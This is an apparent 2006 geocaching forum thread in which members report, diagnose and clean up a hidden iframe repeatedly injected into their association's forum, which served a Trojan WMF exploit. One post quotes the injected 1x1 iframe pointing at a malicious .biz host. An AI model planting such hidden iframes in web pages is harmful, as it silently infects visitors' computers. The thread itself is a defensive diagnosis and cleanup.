+TheRoundings Posted November 10, 2006 Share Posted November 10, 2006 (edited) I see that the site link: http:// www.gagb.org.uk/forum (note space included so as to break the link) is spawning: http:// zebxmzbsx.biz/dll/adv631.php (again space included so as to break the link) which is calling an image called: xpladv631[1].wmf This is blocked by my browser and is not something related to just my computer. This happens on two colleagues computers also. Does anyone know what this? Is it a virus? I am concerned to visit the forums again on the GAGB site until I know what this is. Duncan EDIT: Update - this image is seen as a Trojan by McAfee VirusScan in my virus scanning logs Edited November 10, 2006 by TheRoundings Quote Link to comment
+mongoose39uk Posted November 10, 2006 Share Posted November 10, 2006 Are you colleagues on the same network? Cannot see a problem from here! Quote Link to comment
+Tiger-Eyes Posted November 10, 2006 Share Posted November 10, 2006 I have the GAGB forums on constantly as one of my pages on Opera I have just run a virus scan to double check but nothing has been detected (I use Norton Internet security protection) Quote Link to comment
NickPick Posted November 10, 2006 Share Posted November 10, 2006 My Symantec AV is reporting the same problem. It appears to be trying to open a .wmf file, and my AV is reporting it as a Downloader. It's probably not showing up in Opera as it's probably an IE only problem. Quote Link to comment
+TheRoundings Posted November 10, 2006 Author Share Posted November 10, 2006 (edited) Initially I was at work. I've now got home and tried from here and the same occurs. If you're not quick you will not see it. It only happens with the first session of GAGB in your browser or at least until the file is cached. Close your browser open again, then go to http:// www.gagb.org.uk/forum. After a short while the page is redirecting to http:// www.gagb.lunarpages.com/forum/ which is normal then after a short duration you can see a load from http:// zebxmzbsx.biz/dll/adv631.php This happens only after opening your browser and navigating the first time. Edit: This happens with FF2.0 and IE7. Edited November 10, 2006 by TheRoundings Quote Link to comment
+rutson Posted November 10, 2006 Share Posted November 10, 2006 Yep, here's the offending code (line 247 of the index page): <iframe src="http://zebxmzrbsx.biz/dl/adv631.php" width=1 height=1></iframe> Looks to me like it's been hacked, though it's hardly surprising given the forum software is three years old and has a list of possible ways to attack it as long as your arm. Quote Link to comment
+mongoose39uk Posted November 10, 2006 Share Posted November 10, 2006 yep found it now. Will get Teasel onto it Quote Link to comment
+TheRoundings Posted November 10, 2006 Author Share Posted November 10, 2006 Please post back on this thread when it's removed so we know it's safe again. Quote Link to comment
+CrazyL200 Posted November 10, 2006 Share Posted November 10, 2006 VIRUS Detected - called Exploit. Fortunately my AV software stopped it downloading some picture or another, but crashed IE, then the PC in the process. Quote Link to comment
+Haggis Hunter Posted November 10, 2006 Share Posted November 10, 2006 No offence meant towards GAGB, but I have just spent £200 after my PC crashed and melted. I have just deleted their forums from my bookmark list. I don't want to click on it by accident!! Quote Link to comment
+Bill D (wwh) Posted November 11, 2006 Share Posted November 11, 2006 We're aware of this. I'm quite au fait with the website, but Invision and MySQL aren't my line - I spent an age last night trying to find the problem, but with no success. Ian (Teasel), who's our webmaster, seems to be away at the moment and we can't get hold of him, so it looks as if we're stuck with this until he comes back. If you're using an up-to-date AV program and a firewall this shouldn't be a problem. If you're not, you really should be. --- Bill, Chairman GAGB Quote Link to comment
+Bill D (wwh) Posted November 11, 2006 Share Posted November 11, 2006 The problem is now sorted. Many thanks to Barry Hunter, who very kindly offered to take a look, and has now found the offending code and removed it. Many thanks indeed, Barry! --- Bill, Chairman GAGB Quote Link to comment
+kewfriend Posted November 11, 2006 Share Posted November 11, 2006 In setting a recent cache I found that a perfectly innocent local tourist type website had also been penetrated and was shipping out a trojan. hmmmm this will make it more diff to do the cache grrrr Quote Link to comment
Team 'James W' Posted November 12, 2006 Share Posted November 12, 2006 ....Get an Apple Mac!! Not helpful, I know Sorry! <Tounge-in-cheek smugness is sure to come back and bite me one day> Quote Link to comment
+mongoose39uk Posted November 12, 2006 Share Posted November 12, 2006 Can Mac run GSAK without a windows Emulator? Quote Link to comment
+The Bolas Heathens Posted November 12, 2006 Share Posted November 12, 2006 (edited) Yes - the new Intel ones can. I do it all the time and can run any Windows application on my Mac desktop without using an emulator . I was just wondering, does the issue just affect IE users or does it affect Firefox too? Can Mac run GSAK without a windows Emulator? Edited November 12, 2006 by The Bolas Heathens Quote Link to comment
+TheRoundings Posted November 12, 2006 Author Share Posted November 12, 2006 FF and IE were affected. It was nothing to do with the browser. Another page was automatically called after the main forum page which tried to load a Trojan windows metafile image. The security settings in each browser could've restricted it however most people relax their settings for more convenient browsing. In this case it was an easy catch for anyone with uptodate virus checking. Quote Link to comment
+The Blorenges Posted November 15, 2006 Share Posted November 15, 2006 Don't go there! They've come back again! MrsB Quote Link to comment
+Dorsetgal & GeoDog Posted November 15, 2006 Share Posted November 15, 2006 Virus mid election? Coincidence or what? Quote Link to comment
+mongoose39uk Posted November 15, 2006 Share Posted November 15, 2006 Election That finished last week I have emailed Barry to ask him if the can take a look and clear it up again. Thanks for letting us know Mrs B Any spare bread for Bet btw. Quote Link to comment
barryhunter Posted November 15, 2006 Share Posted November 15, 2006 (edited) sorry, never received any email, but opening up the database now... edit: ahh only just realised how soon I happened to check the forum, the email was still flying though the interweb Anyway: the injected code has been removed, included the most basic of innocualtion, but I can forward findings to hopefully plug the hole! Edited November 15, 2006 by barryhunter Quote Link to comment
+drsolly Posted November 15, 2006 Share Posted November 15, 2006 A couple of years ago, The Register (an online tech newsletter that I read most days) was hit by a "driveby". It was actually in their advertising, which is outsourced, but that's no comfort. Just by accessing the relevant advert(s) (which you had no choice in), an "iframe exploit" was installed on your computer (translation, a bunch of horrible was installed on your computer), which was really really difficult to remove (recommended method - reformat your disk and reinstall Windows). It was after that, that I decided that using Internet Explorer (and Outlook) was just too difficult for me, and I switched. Many people use the Firefox browser, which seems to suffer from fewer of such problems. I went the whole hog, and dropped Windows in favour of Linux. This also means that I don't use (or, probably, need) an antivirus Another part of the problem is false alarms, such as this one: http://news.com.com/Microsoft+flags+Gmail+..._3-6135154.html Currently, I'm getting send maybe a dozen viruses (or trojans, or, well, I don't ccare) per day in my email, and heaven knows what horriblenesses I'm accessing on the web, but it's all water off a geocacher's back, because they're all Windows-oriented. Recommendation - check out Firefox, or any other browser that isn't Internet Explorer, because it's IE that the black hats are targeting. Disclaimer - I no longer have any financial interest in any antivirus company. Quote Link to comment
+Bill D (wwh) Posted November 15, 2006 Share Posted November 15, 2006 I've only just seen this - I've been out since early afternoon. Barry, many thanks once again!!! Quote Link to comment
+The Blorenges Posted November 18, 2006 Share Posted November 18, 2006 Remember... I'm just the messenger... It's back ! MrsB Quote Link to comment
+sTeamTraen Posted November 18, 2006 Share Posted November 18, 2006 Most of the nasties seem to be written in Javascript and will have a fighting chance of working on Firefox as well. However, their binary payloads won't work on Linux I've just been put in charge of the network security team at work and I'm reviewing our site filtering policies. Currently we have an ineffectual 7-year-old list of porn sites and we block assorted malware providers as we detect them. But I'm thinking of just blocking *.biz and seeing if anyone calls! Quote Link to comment
barryhunter Posted November 18, 2006 Share Posted November 18, 2006 (edited) ... I thought I had posted this about 12.30, but got lost with the dodgy internet connection (it was still open in text editor used for spell checking) ... Arrg! Gone again, interestingly it looks like its a person manually cracking into it as they adapted to get round the inoculation I applied. (It could be an automated virus breaking in, but the change is a definite shift in what was happening). If I get a chance over the weekend will have a look at the logs to see if can spot how its happening... Edited November 18, 2006 by barryhunter Quote Link to comment
Edgemaster Posted November 18, 2006 Share Posted November 18, 2006 (edited) Get the forum software upgraded. One entry point in php can give a cracker full access to the webserver it's hosted on. I should also add, that once someone has one access point they'll quite often add backdoors in. Best way to go is to make sure you have clean copies of configuration and any template changes made and do a reinstall, nasty stuff can hide in there. Edited November 18, 2006 by Edgemaster Quote Link to comment
+Bill D (wwh) Posted November 18, 2006 Share Posted November 18, 2006 (edited) Barry, many thanks for helping out again! Edgemaster, yes, all that sounds like a good idea, but it's not my pigeon - it'll have to wait for Ian (Teasel). Edit: I forgot to say that I was beginning to wonder if it was someone doing it manually... Edited November 18, 2006 by Bill D (wwh) Quote Link to comment
+Geotrotters Posted November 18, 2006 Share Posted November 18, 2006 Yes - the new Intel ones can. I do it all the time and can run any Windows application on my Mac desktop without using an emulator . I was just wondering, does the issue just affect IE users or does it affect Firefox too? Can Mac run GSAK without a windows Emulator? Yes, you're running them without an emulator but you're still having to use Windows. (using Bootcamp or parallels). This will still leave you open to virus's in your Windows applications as it's the Mac OSX operating systems that's safe not the Windows install that's sitting on top of it. The one plus point is that Parallels runs Windows in a virtual machine so the Virus will only affect the Windows install and not the complete mac software. Quote Link to comment
+The Blorenges Posted November 20, 2006 Share Posted November 20, 2006 Is it safe to go back yet? MrsB Quote Link to comment
+Bill D (wwh) Posted November 20, 2006 Share Posted November 20, 2006 (edited) It is at the moment... But any website is liable to get hacked, so make sure you're using an up-to-date antivirus program, and preferably a personal firewall too. I use the free versions of Avast antivirus and Zone Labs firewall. I continued to visit the GAGB forums during the periods the virus was there, and had no problems. I'm using Firefox, and I think Ff stopped the link opening, as I accessed the forums on my sister's computer using IE and Avast stopped the virus. On mine Avast never got to see the virus as it didn't get to me at all. Edit to add: And make sure your antivirus and firewall are updated regularly - I have Avast and Zonelabs set to check automatically for updates. Edited November 20, 2006 by Bill D (wwh) Quote Link to comment
+kewfriend Posted November 20, 2006 Share Posted November 20, 2006 Is it safe to go back yet? MrsB It is until they release JAWS2 Quote Link to comment
+stora Posted November 20, 2006 Share Posted November 20, 2006 (edited) It is at the moment... But any website is liable to get hacked, so make sure you're using an up-to-date antivirus program, and preferably a personal firewall too. I use the free versions of Avast antivirus and Zone Labs firewall. I continued to visit the GAGB forums during the periods the virus was there, and had no problems. I'm using Firefox, and I think Ff stopped the link opening, as I accessed the forums on my sister's computer using IE and Avast stopped the virus. On mine Avast never got to see the virus as it didn't get to me at all. Edit to add: And make sure your antivirus and firewall are updated regularly - I have Avast and Zonelabs set to check automatically for updates. Doesn't sound very reassuring. I'll let MrsB go first and report if all is clear Edited November 20, 2006 by stora Quote Link to comment
+The Blorenges Posted November 20, 2006 Share Posted November 20, 2006 I've just come back from there... It seems OK at the moment... MrsB Quote Link to comment
+The Blorenges Posted November 20, 2006 Share Posted November 20, 2006 Joking aside...Just went back to GAGB and once again McAfee is immediately giving me pop-ups of Trojans and potentially harmful scripts being removed. I've never come across this before on any of the other sites that I drop into. McAfee is obviously "doing its stuff" and protecting my pc but I'm not inclined to hang around on the site knowing that it's regularly being infected. I won't be back until I feel confident that it's been properly cleaned up. MrsB Quote Link to comment
barryhunter Posted November 20, 2006 Share Posted November 20, 2006 I can certify it clean now, and now being able to actully devote time to diagnose the problem rather than cut and run. It looks like it should be patchable until the software can be upgraded. Quote Link to comment
+Bill D (wwh) Posted November 20, 2006 Share Posted November 20, 2006 Barry, many thanks for helping us out yet again! Quote Link to comment
+Alice Band Posted November 21, 2006 Share Posted November 21, 2006 (edited) I visited the site tonight and my Anti-Virus went mad. Hmmm, judging by the speed and method that things are being re-inserted I wonder if the cause of it is reading this thread. Can you track some of the traffic? Surely this form of attack is manual, not bot? I still remember the porn attacks this forum had recently - someone with a grudge? Edited November 21, 2006 by Alice Band Quote Link to comment
barryhunter Posted November 21, 2006 Share Posted November 21, 2006 It is removed, but as Bill mentioned AV should be installed as per the course (but a sad course of affiars!) anyway. I should add that I have now been able to track at least one very suspiuous access. It 'browsed' the site too quick to be a real person, almost certainly a bot visiting. I've blocked that computer and also installed tracking to get much more verbose info if it should happen again. (previouslly been able to do little more than remove the naughty-code each time, nothing to really stop it happening again, but now been able to learn about the gagb website) Quote Link to comment
nobby.nobbs Posted November 21, 2006 Share Posted November 21, 2006 i've been there regularly without ( touch wood) problems. please keep coming as the site has been much better recently due to all the people participating in the forums. plus a uk off topic play area! Quote Link to comment
+Haggis Hunter Posted November 21, 2006 Share Posted November 21, 2006 I still remember the porn attacks this forum had recently - someone with a grudge? DAM.N I must have missed that!! Quote Link to comment
+Alice Band Posted November 21, 2006 Share Posted November 21, 2006 I should add that I have now been able to track at least one very suspiuous access. It 'browsed' the site too quick to be a real person, almost certainly a bot visiting. I've blocked that computer and also installed tracking to get much more verbose info if it should happen again. A well-done for all your hard work Barry. Hopefully this is the last we hear of it. Quote Link to comment
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.